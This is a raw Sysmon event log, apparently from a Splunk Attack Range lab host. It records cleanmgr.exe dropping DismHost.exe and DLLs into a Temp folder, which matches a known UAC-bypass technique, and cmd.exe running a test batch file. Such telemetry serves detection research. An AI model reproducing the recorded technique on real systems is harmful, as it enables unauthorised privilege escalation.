Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D3CFDDAEA0C7BC29E1228F9865C8F0F,SHA256=7C64F00727D5DA0BC3C9997160E6641D994606BA040BD797B5415B1A21C0293F,IMPHASH=00000000000000000000000000000000falsetrue 
11241100x80000000000000001050678Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.686{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\DmiProvider.dll2021-07-12 07:56:58.686 11241100x80000000000000001050677Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.685{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\DismProv.dll2021-07-12 07:56:58.685 11241100x80000000000000001050676Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localEXE2021-07-12 07:56:58.684{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\DismHost.exe2021-07-12 07:56:58.684 11241100x80000000000000001050675Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.683{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\DismCorePS.dll2021-07-12 07:56:58.683 11241100x80000000000000001050674Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.682{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\DismCore.dll2021-07-12 07:56:58.682 11241100x80000000000000001050673Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.682{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\CompatProvider.dll2021-07-12 07:56:58.682 354300x80000000000000001050672Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:50.186{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57326-false10.0.1.14win-dc-890.attackrange.local49676- 11241100x80000000000000001050671Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.665{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\CbsProvider.dll2021-07-12 07:56:58.665 11241100x80000000000000001050670Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.665{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\AssocProvider.dll2021-07-12 07:56:58.665 11241100x80000000000000001050669Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.665{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\AppxProvider.dll2021-07-12 07:56:58.665 10341000x80000000000000001050668Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:58.602{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050667Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.533{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050666Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:58.533{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001050665Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.502{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=753197458FDE1D6CC0CF5F1EA1EBF811,SHA256=09A8F8D1AE2D773C1A54B08FECDF87CFF7A0DC2CC2517591B6F0464CCD8F980E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050664Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.433{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F5CA-60EB-6A7D-00000000CF01}9944C:\Windows\System32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050663Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:58.433{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F5CA-60EB-6A7D-00000000CF01}9944C:\Windows\System32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050662Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.385{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F5CA-60EB-6A7D-00000000CF01}9944C:\Windows\System32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050661Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.384{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F5CA-60EB-6A7D-00000000CF01}9944C:\Windows\System32\cmd.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050660Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:58.349{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5CA-60EB-6A7D-00000000CF01}9944C:\Windows\System32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050659Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.333{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5CA-60EB-6A7D-00000000CF01}9944C:\Windows\System32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050658Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:58.333{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F5CA-60EB-6C7D-00000000CF01}7668C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050657Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.333{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F5CA-60EB-6C7D-00000000CF01}7668C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050656Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.286{466BC892-32D3-60E8-770B-00000000CF01}635610084C:\Windows\Explorer.EXE{466BC892-F5CA-60EB-6A7D-00000000CF01}9944C:\Windows\System32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050655Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:58.286{466BC892-32D3-60E8-770B-00000000CF01}635610084C:\Windows\Explorer.EXE{466BC892-F5CA-60EB-6A7D-00000000CF01}9944C:\Windows\System32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050654Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.286{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050653Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.286{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001050652Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.286{466BC892-32D3-60E8-770B-00000000CF01}635610084C:\Windows\Explorer.EXE{466BC892-F5CA-60EB-6A7D-00000000CF01}9944C:\Windows\System32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050651Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.233{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F5CA-60EB-6C7D-00000000CF01}7668C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050650Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:58.233{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F5CA-60EB-6C7D-00000000CF01}7668C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050649Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.219{466BC892-F5C8-60EB-657D-00000000CF01}84086488C:\Windows\system32\conhost.exe{466BC892-F5CA-60EB-6D7D-00000000CF01}8436C:\Windows\system32\timeout.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050648Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.219{466BC892-F5CA-60EB-6C7D-00000000CF01}766810116C:\Windows\system32\conhost.exe{466BC892-F5CA-60EB-6A7D-00000000CF01}9944C:\Windows\System32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050647Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:58.219{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050646Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.219{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050645Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:58.219{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050644Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.219{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050643Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:58.219{466BC892-32CD-60E8-670B-00000000CF01}45164260C:\Windows\system32\csrss.exe{466BC892-F5CA-60EB-6D7D-00000000CF01}8436C:\Windows\system32\timeout.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050642Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.219{466BC892-F5C8-60EB-647D-00000000CF01}98726276C:\Windows\system32\cmd.exe{466BC892-F5CA-60EB-6D7D-00000000CF01}8436C:\Windows\system32\timeout.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050641Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.222{466BC892-F5CA-60EB-6D7D-00000000CF01}8436C:\Windows\System32\timeout.exe10.0.14393.0 (rs1_release.160715-1616)timeout - pauses command processingMicrosoft® Windows® Operating SystemMicrosoft Corporationtimeout.exetimeout /t 3 C:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=FF04FB5121867334F841D5EFD133633B,SHA256=F9B3348029B76BBB658A097BF361EA72CEFA0D15CE444E9E8A689B35B67A78E7,IMPHASH=709A3AA304E78434B9FA3FE865133AD0{466BC892-F5C8-60EB-647D-00000000CF01}9872C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\test\sil.bat" " 10341000x80000000000000001050640Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
